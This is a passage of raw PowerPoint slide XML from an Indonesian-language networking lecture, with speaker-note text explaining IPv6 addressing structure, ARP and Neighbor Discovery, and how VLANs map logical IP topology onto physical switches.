              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IPv6 128-bit. Alamat IPv6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditulis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>notasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>heksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: 2001:db8::abc:0:def0:1234. Pada IPv6, 64-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terakhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host. 64-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hirarki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, router ISP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 48-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di-host di Internet global. Di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, administrator situs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 16-bit yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 64 bit) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subnet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Paket yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diteruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengalamatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> 2. IPv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Address Resolution Protocol (ARP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> IP host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> MAC. IPv6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Neighbor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Discovery (ND) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sama</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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6619440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LAN Virtual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memetakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LAN virtual (VLAN) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> switch. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ID VLAN yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. ID VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4.094. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port switch yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain broadcast yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VLAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
